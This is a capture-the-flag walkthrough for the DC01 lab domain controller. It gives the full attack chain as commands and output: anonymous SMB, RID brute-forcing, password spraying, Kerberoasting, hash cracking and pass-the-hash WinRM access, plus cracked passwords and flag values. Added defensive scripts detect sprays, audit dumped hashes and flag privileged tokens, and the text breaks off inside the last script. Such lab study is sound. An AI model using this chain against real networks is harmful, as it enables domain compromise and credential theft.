20.DC01

1. Basic information

Machine link: https://hackmyvm.eu/machines/machine.php?vm=DC01
Difficulty: ⭐️⭐️⭐️⭐️
Topics: SMB anonymous login, RID enumeration, SPNs
It has been a long time since I last did a Windows box. This is the first Windows machine I have done on HackMyVM.

2. Information gathering

192.168.56.128:445 open
192.168.56.128:88 open
192.168.56.128:139 open
192.168.56.128:135 open
[*] alive ports len is: 4
start vulscan
[*] NetBios 192.168.56.128  [+] DC:SOUPEDECODE\DC01
[*] NetInfo
[*]192.168.56.128
   [->]DC01
   [->]192.168.56.128
nmap -sC -sV 192.168.56.128 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 13:03 CST
Nmap scan report for 192.168.56.128
Host is up (0.00030s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-19 20:05:09Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49689/tcp open  msrpc         Microsoft Windows RPC
49709/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:08:32:AA (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:08:32:aa (Oracle VirtualBox virtual NIC)
| smb2-time:
|   date: 2024-11-19T20:05:57
|_  start_date: N/A
|_clock-skew: 14h59m58s

The target is running Kerberos, LDAP and SMB, all hallmarks of a Windows domain controller.

Domain name: SOUPEDECODE (the LDAP banner gives the full name SOUPEDECODE.LOCAL)

First add the domain to /etc/hosts:

192.168.56.128 SOUPEDECODE.LOCAL DC01.SOUPEDECODE.LOCAL

3. SMB

Ports 139 and 445 are open, an obvious SMB signature.

Use smbmap to enumerate the SMB service and check whether anonymous or guest login is allowed:

smbmap -u anonymous -H SOUPEDECODE.LOCAL


[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
                                                                                              
[+] IP: 192.168.56.128:445      Name: soupedcode.loacl          Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        backup                                                  NO ACCESS
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share
        SYSVOL                                                  NO ACCESS       Logon server share
        Users                                                   NO ACCESS

IPC$ is readable.

Anonymous login works, so we can use this account to brute-force relative identifiers (RIDs) and enumerate the other users in the domain:

crackmapexec smb SOUPEDECODE.LOCAL -u 'anonymous' -p '' --rid-brute > rid_bruteforce.txt

cat rid_bruteforce.txt | grep SidTypeUser | cut -d '\' -f2 | cut -d ' ' -f1 > valid_users.txt

RID enumeration gives us more than 1000 usernames.

We could use these users for AS-REP Roasting, but every attempt failed: all of these accounts have the "Kerberos pre-authentication required" attribute set.

4. SMB password spraying

┌──(root㉿kali)-[/home/kali/hmv/DC01]
└─# crackmapexec smb SOUPEDECODE.LOCAL -u valid_users.txt -p valid_users.txt  --no-bruteforce
SMB         SOUPEDECODE.LOCAL 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\Administrator:Administrator STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\Guest:Guest STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\krbtgt:krbtgt STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\DC01$:DC01$ STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\bmark0:bmark0 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\otara1:otara1 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\kleo2:kleo2 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\eyara3:eyara3 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\pquinn4:pquinn4 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\jharper5:jharper5 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\bxenia6:bxenia6 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\gmona7:gmona7 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\oaaron8:oaaron8 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\pleo9:pleo9 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\evictor10:evictor10 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\wreed11:wreed11 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\bgavin12:bgavin12 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\ndelia13:ndelia13 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\akevin14:akevin14 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\kxenia15:kxenia15 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\ycody16:ycody16 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\qnora17:qnora17 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\dyvonne18:dyvonne18 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\qxenia19:qxenia19 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\rreed20:rreed20 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\icody21:icody21 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\ftom22:ftom22 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\ijake23:ijake23 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\rpenny24:rpenny24 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\jiris25:jiris25 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\colivia26:colivia26 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\pyvonne27:pyvonne27 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [-] SOUPEDECODE.LOCAL\zfrank28:zfrank28 STATUS_LOGON_FAILURE
SMB         SOUPEDECODE.LOCAL 445    DC01             [+] SOUPEDECODE.LOCAL\ybob317:ybob317

We got one valid username and password pair:

ybob317:ybob317
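Seen from the domain controller's security log, the spray above has a very distinctive shape: a single source address failing once against each of many different accounts within a short window, which is the opposite of a brute force hammering one account. The following Python is an added example of that detection logic, not part of the writeup; it runs over constructed records modelled on the TimeCreated, TargetUserName, IpAddress and SubStatus fields of Event ID 4625. The field layout, the thresholds and the source IP addresses are assumptions; the account names are reused from the user list on this page.

```python
"""Flag password-spray behaviour in Windows logon-failure records.

Added example, not part of the writeup: the defender-side view of the spray in
section 4. A spray looks like one source failing against many distinct
accounts, each only once or twice, inside a short window; a brute force hits
one account many times. The records below are constructed to mimic Event ID
4625 fields and are not real log data.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4625-style records: (timestamp, target account, source ip, sub-status).
# 0xC000006A = bad password. The sub-status is carried for reporting only; an
# unknown-user failure (0xC0000064) would be counted exactly the same way.
SAMPLE_EVENTS = [
    ("2024-11-19T20:10:00", "Administrator", "192.168.56.101", "0xC000006A"),
    ("2024-11-19T20:10:10", "Guest",         "192.168.56.101", "0xC000006A"),
    ("2024-11-19T20:10:20", "krbtgt",        "192.168.56.101", "0xC000006A"),
    ("2024-11-19T20:10:30", "bmark0",        "192.168.56.101", "0xC000006A"),
    ("2024-11-19T20:10:40", "otara1",        "192.168.56.101", "0xC000006A"),
    ("2024-11-19T20:10:50", "kleo2",         "192.168.56.101", "0xC000006A"),
    ("2024-11-19T20:11:00", "eyara3",        "192.168.56.101", "0xC000006A"),
    ("2024-11-19T20:11:10", "pquinn4",       "192.168.56.101", "0xC000006A"),
    ("2024-11-19T20:11:20", "jharper5",      "192.168.56.101", "0xC000006A"),
    ("2024-11-19T20:11:30", "bxenia6",       "192.168.56.101", "0xC000006A"),
    ("2024-11-19T20:11:40", "gmona7",        "192.168.56.101", "0xC000006A"),
    ("2024-11-19T20:11:50", "oaaron8",       "192.168.56.101", "0xC000006A"),
    # A user mistyping their own password three times is not a spray.
    ("2024-11-19T20:30:00", "jharper5",      "192.168.56.50",  "0xC000006A"),
    ("2024-11-19T20:30:20", "jharper5",      "192.168.56.50",  "0xC000006A"),
    ("2024-11-19T20:30:45", "jharper5",      "192.168.56.50",  "0xC000006A"),
]

WINDOW = timedelta(minutes=10)   # how long a run of failures is correlated
MIN_DISTINCT_USERS = 10          # a spray touches many accounts ...
MAX_PER_USER = 2                 # ... but stays below any sane lockout threshold per account


def parse_events(rows):
    """Turn the string records into (datetime, user, ip, substatus) tuples."""
    return [(datetime.fromisoformat(ts), user.lower(), ip, sub) for ts, user, ip, sub in rows]


def detect_spray(events, window=WINDOW, min_users=MIN_DISTINCT_USERS, max_per_user=MAX_PER_USER):
    """Return {source_ip: sorted accounts targeted} for every source whose failures,
    inside some window of length `window`, cover at least `min_users` distinct
    accounts with no single account tried more than `max_per_user` times."""
    by_source = defaultdict(list)
    for ts, user, ip, _sub in events:
        by_source[ip].append((ts, user))

    hits = {}
    for ip, rows in by_source.items():
        rows.sort()
        counts = defaultdict(int)      # attempts per account inside the sliding window
        targeted = set()
        start = 0
        for ts, user in rows:
            counts[user] += 1
            # Slide the window start forward until it spans at most `window`.
            while ts - rows[start][0] > window:
                old = rows[start][1]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                start += 1
            if len(counts) >= min_users and max(counts.values()) <= max_per_user:
                targeted.update(counts)
        if targeted:
            hits[ip] = sorted(targeted)
    return hits


if __name__ == "__main__":
    for ip, users in detect_spray(parse_events(SAMPLE_EVENTS)).items():
        print(f"possible password spray from {ip}: {len(users)} accounts, e.g. {', '.join(users[:5])}")
```

The per-account cap is the important knob: an attacker who respects the lockout policy, as the warning later in this writeup advises, never trips the per-account lockout alert, so the detection has to key on breadth across accounts rather than depth on one.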

Enumerating Kerberos Service Principal Names (SPNs)

Use impacket-GetUserSPNs to enumerate the accounts that have SPNs registered and to request a Kerberos service ticket (TGS) for each of them. Authenticating as ybob317 gives us a TGT; with that TGT we ask the KDC's ticket-granting service for a TGS for each SPN, and because the TGS is encrypted with the service account's key it can be cracked offline.

Before enumerating these accounts we need to synchronise the attacker machine's clock with the domain controller, otherwise the connection fails: Kerberos rejects requests whose timestamp differs from the KDC's by more than five minutes (the default tolerance), and the nmap output above already reported a skew of 14h59m58s.

timedatectl set-ntp off
rdate -n  192.168.56.128
impacket-GetUserSPNs SOUPEDECODE.LOCAL/ybob317 -dc-ip 192.168.56.128 -usersfile valid_users.txt -request -outputfile spn-users.tgs

[screenshot 20.DC01.001]

5. Cracking with hashcat

With the TGS of a service account on the target in hand, hashcat can be used to crack it:

hashcat -a 0 -m 13100 spn-users.tgs /usr/share/wordlists/rockyou.txt  

$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$file_svc*$819b74fc74d654f64b4ffcd59fcaffa8$1b2935d454f2797b08b5e5e3b1c9e093b5982e38edfb66c99f2264bcfa47284eaccdebc1bd926bde0a24db8ff34869da0d52fdfcaca2fea7e6c3b5476b5c4e231c842616b12bf97e643c060983421dd1cf6f358f0569f4214516f0eec01111e543b0035a5dc28332619c22e939a86e5a08fa586f06aa8e2c3c553d79057cfde0f60e99a072ee8edbee9412043b665fb117284513fb9c78b212af0d8447c6f96ff2cd75e921fda971125a358ac502935ad8f451ef5a441514b331e41196310c20235f38849402bb94d4d7e505d249a3d961a1dfecb3e11f7fc395ec3a4d49fb67d44a0c56b46a8bbea697b766bc493b1de8c79428efae71ef27b1ac43ebc85be78d2829dcd0700b09333bfe841a458c90fbba29bd2d997e7b8a5c6174104985675bd8e6b78241ee114b15f5e57b66e35467aa89d827cae400c0cf7618acae7909eaf536dc1e5cceadb028c5113e269d4de9c75703cc3e8c71883a981a233d7564715b27982284f3943da002846358961d7fb54de55b90ab02f41f0a357a083721601fc7a655815a8cc6d20024639be7e610b7fe65969c06ea6efa388e203821c3480605be47e37c44226fcdabcec441cf0bfca7e7d99ffdc5ca0a28b8d0c6dd99fa55209dbec51eebd49faeebb1d801efda2c78f966e63767c541cee0d017581770e9780d0316e0173382e6774f95e00b3dda7d0eb05f7766b1f76726eb26395561cd9c2d55af8057cc35bfb7b2468006d80ab8c2b68ef0281659e598f117bf0d2a57179d4e203256374e1dbb20dfaafd40316c508fc88ac2ccb53658ec19d6439f5a2956fc76e24ad09b4ecd452022758f79a0a0878c60e21ceb0059a22dcf5965012e9e9a0dab3222180880e0f5da3c0aaddb76587a7452ce2a37b21d7f68d097ef78b25fab43f43d60c59c2b48c9c8542e9c05099ff1a59c66c66731915e3ceddb579ee2dca663270904eec929004bb6b9081a37ceb9d6848fed0ce388721ceafe05175a8564b262c043244f90d01d9a51c3291fe4f16091b80ddf883e14e4f2531afb77d25a41f18cbb2b30de0f9ecd778821ecb2526041398178b3b58ac0057d0ebba808d6845a4353fdbcd012d9a08874f7e4c24c1ad40cf2c65b053bc056a1479fbc1cb84140c34ec1ead95dd5555794c3c1c6657b2b8f5c4f47b2fbd0889dac1ae71dc8f8abdd1ac9ae13d9e2b1192d191811bb6a38f3162ea4baf2322b1b38cd6bbf6662c6920a2c71d6e72ac0686cd2aecc7f9f54b499b194f7f6ee8ca01f792ff0a784641ea5efed8c0940314efc87fbcdb997e311cc48e95f766d2c6a325ece96089d7ca723195f9ff8812cb807d039d4345ba7def5903ed5d19f995f1720fe3e6a3709d01977f086f0fe351e9a767d5ccbc2e9b92bb29715ab0edc32cb800decdbcdf9977e3558992782afdd7e56b65e703e1360117af01e8c96149ad27525f9b45b62b0b4a6ea407c0a4162789879307cfd7e6cd62ccf01e8ff73:Password123!!

We recovered the password of the file_svc user:

file_svc:Password123!!

The name alone suggests it is related to a file service.

6. Checking SMB again

crackmapexec smb SOUPEDECODE.LOCAL -u file_svc -p 'Password123!!' --shares

[screenshot 20.DC01.002]

We can see there is a backup share.

7. Connecting with smbclient

smbclient -U 'file_svc' //SOUPEDECODE.LOCAL/backup
Password for [WORKGROUP\file_svc]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jun 18 01:41:17 2024
  ..                                 DR        0  Tue Jun 18 01:44:56 2024
  backup_extract.txt                  A      892  Mon Jun 17 16:41:05 2024

                12942591 blocks of size 4096. 10958701 blocks available
smb: \> ls -la
NT_STATUS_NO_SUCH_FILE listing \-la
smb: \> dir -a
NT_STATUS_NO_SUCH_FILE listing \-a
smb: \> ls -a
NT_STATUS_NO_SUCH_FILE listing \-a
smb: \> ls
  .                                   D        0  Tue Jun 18 01:41:17 2024
  ..                                 DR        0  Tue Jun 18 01:44:56 2024
  backup_extract.txt                  A      892  Mon Jun 17 16:41:05 2024

                12942591 blocks of size 4096. 10958701 blocks available
smb: \> get backup_extract.txt
getting file \backup_extract.txt of size 892 as backup_extract.txt (58.1 KiloBytes/sec) (average 58.1 KiloBytes/sec)
smb: \> exit
cat backup_extract.txt
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::

We obtained the NTLM password hashes of several service accounts on the target. Use these hashes together with the user list from earlier to check whether any password is being reused.

Warning

In a real penetration test, it is essential to limit the number of password-spraying attempts according to the account lockout policy of the environment. This precaution helps prevent sensitive accounts from being locked out unexpectedly, which could disrupt the client's operations.

cat backup_extract.txt | cut -d '$' -f1 > names.txt
cat backup_extract.txt | cut -d ':' -f4 > hashes.txt
crackmapexec smb SOUPEDECODE.LOCAL -u valid_users.txt  -H hashes.txt | grep -v '[-]'

[screenshot 20.DC01.003]

The spray succeeds for the FileServer$ account, which means we can connect to DC01 as this user; the DC is what grants this account its share permissions, so a connection to DC01 is certain to work.
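Instead of replaying the hashes against the user list, the dump itself can be checked for the reuse the text mentions, which is what an auditor reviewing such a backup would do. The Python below is an added example, not the writeup's code: it parses the user:rid:lm:nt::: format of backup_extract.txt, groups the accounts that share an NT hash, and also flags stored LM hashes and blank passwords. The first ten sample lines are copied from the dump above; the LegacyBox$ and svc_old lines are constructed purely to exercise the two extra checks.

```python
"""Audit a pwdump-style hash file for password reuse and weak hash storage.

Added example, not code from the writeup. Two accounts with the same NT hash
share a password; an LM field other than the well-known empty value means LM
hashes are still being stored; an NT hash equal to that of the empty string
is a blank password. The first ten lines are the writeup's backup_extract.txt,
the last two (LegacyBox$, svc_old) are constructed for the extra checks.
"""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash when LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

SAMPLE_DUMP = """\
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
LegacyBox$:2130:0123456789abcdef0123456789abcdef:0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f:::
svc_old:2131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def parse_dump(text):
    """Parse user:rid:lm:nt::: lines into dicts; malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[0]:
            continue
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue
        entries.append({"user": user, "rid": int(rid), "lm": lm, "nt": nt})
    return entries


def reused_nt_hashes(entries):
    """Map each NT hash that appears on more than one account to those accounts."""
    seen = defaultdict(list)
    for e in entries:
        seen[e["nt"]].append(e["user"])
    return {nt: users for nt, users in seen.items() if len(users) > 1}


def accounts_with_lm(entries):
    """Accounts whose LM field is not the empty/disabled value."""
    return [e["user"] for e in entries if e["lm"] != EMPTY_LM]


def accounts_with_blank_password(entries):
    """Accounts whose NT hash is the hash of the empty string."""
    return [e["user"] for e in entries if e["nt"] == EMPTY_NT]


def machine_accounts(entries):
    """Computer accounts are recognisable by the trailing $."""
    return [e["user"] for e in entries if e["user"].endswith("$")]


if __name__ == "__main__":
    dump = parse_dump(SAMPLE_DUMP)
    for nt, users in reused_nt_hashes(dump).items():
        print(f"same password on {', '.join(users)} (NT {nt[:8]}...)")
    print("LM hash still stored:", accounts_with_lm(dump))
    print("blank password:", accounts_with_blank_password(dump))
```

On this box's dump the script reports two reused passwords (MailServer$ with BackupServer$, and CitrixServer$ with MonitoringServer$) without a single network request, which is the same conclusion the spray reaches but with no lockout risk.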

8. Connecting to DC01 over WinRM

evil-winrm -i 192.168.56.128 -u "FileServer$" -H e41da7e79a4c76dbd9cf79d1cb325559

[screenshot 20.DC01.004]

Check what permissions the fileserver$ account has on the domain controller.

whoami /all
USER INFORMATION
----------------

User Name               SID
======================= ============================================
soupedecode\fileserver$ S-1-5-21-2986980474-46765180-2505414164-2065


GROUP INFORMATION
-----------------

Group Name                                         Type             SID                                         Attributes
================================================== ================ =========================================== ===============================================================
SOUPEDECODE\Domain Computers                       Group            S-1-5-21-2986980474-46765180-2505414164-515 Mandatory group, Enabled by default, Enabled group
Everyone                                           Well-known group S-1-1-0                                     Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access         Alias            S-1-5-32-554                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                      Alias            S-1-5-32-545                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                             Alias            S-1-5-32-544                                Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK                               Well-known group S-1-5-2                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                   Well-known group S-1-5-11                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                     Well-known group S-1-5-15                                    Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Enterprise Admins                      Group            S-1-5-21-2986980474-46765180-2505414164-519 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Denied RODC Password Replication Group Alias            S-1-5-21-2986980474-46765180-2505414164-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication                   Well-known group S-1-5-64-10                                 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level               Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled


USER CLAIMS INFORMATION
-----------------------

We can see that this account is a member of the Administrators group.

So no privilege escalation is needed.

Read the flags directly:

*Evil-WinRM* PS C:\Users\FileServer$\Documents> type C:\Users\ybob317\Desktop\user.txt
6bab1f09a7403980bfeb4c2b412be47b
*Evil-WinRM* PS C:\Users\FileServer$\Documents> type C:\Users\administrator\desktop\root.txt
a9564ebc3289b7a14551baf8ad5ec60a
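A computer account sitting in BUILTIN\Administrators and Enterprise Admins is the misconfiguration that makes the rest of this box unnecessary, and it is easy to spot automatically from the very output shown in section 8. The Python below is an added example, not the writeup's code: it parses the text that `whoami /all` prints and reports the privileged groups and enabled high-impact rights in the token, so the same check can be run over output collected from any host. The sample is a shortened copy of the writeup's own output; the well-known SIDs, RIDs and privilege names are standard Windows values, and the set of rights treated as dangerous is my own choice.

```python
r"""Flag privileged group membership and dangerous rights in `whoami /all` output.

Added example, not code from the writeup. Parses the USER, GROUP and
PRIVILEGES sections of the text `whoami /all` prints and explains why the
token is privileged. The sample is a shortened copy of the writeup's output
for the FileServer$ machine account.
"""
import re

SID_RE = re.compile(r"S-1-\d+(?:-\d+)+")

# Groups that confer administrative control: well-known SIDs matched exactly,
# domain groups matched on the RID at the end of the domain SID.
PRIVILEGED_SIDS = {
    "S-1-5-32-544": "local Administrators",
    "S-1-5-32-548": "Account Operators",
    "S-1-5-32-549": "Server Operators",
    "S-1-5-32-551": "Backup Operators",
}
PRIVILEGED_RIDS = {"512": "Domain Admins", "518": "Schema Admins", "519": "Enterprise Admins"}
# Rights that on their own allow taking over the host when enabled (my selection).
DANGEROUS_PRIVS = {
    "SeDebugPrivilege", "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege", "SeImpersonatePrivilege", "SeEnableDelegationPrivilege",
}
GROUP_TYPES = ("Well-known group", "Group", "Alias", "Label")   # longest first
SECTIONS = ("USER INFORMATION", "GROUP INFORMATION", "PRIVILEGES INFORMATION", "USER CLAIMS INFORMATION")

# Shortened copy of the writeup's `whoami /all` output (section 8).
SAMPLE = r"""
USER INFORMATION
----------------

User Name               SID
======================= ============================================
soupedecode\fileserver$ S-1-5-21-2986980474-46765180-2505414164-2065


GROUP INFORMATION
-----------------

Group Name                                         Type             SID                                         Attributes
================================================== ================ =========================================== ===============================================================
SOUPEDECODE\Domain Computers                       Group            S-1-5-21-2986980474-46765180-2505414164-515 Mandatory group, Enabled by default, Enabled group
Everyone                                           Well-known group S-1-1-0                                     Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                             Alias            S-1-5-32-544                                Mandatory group, Enabled by default, Enabled group, Group owner
SOUPEDECODE\Enterprise Admins                      Group            S-1-5-21-2986980474-46765180-2505414164-519 Mandatory group, Enabled by default, Enabled group
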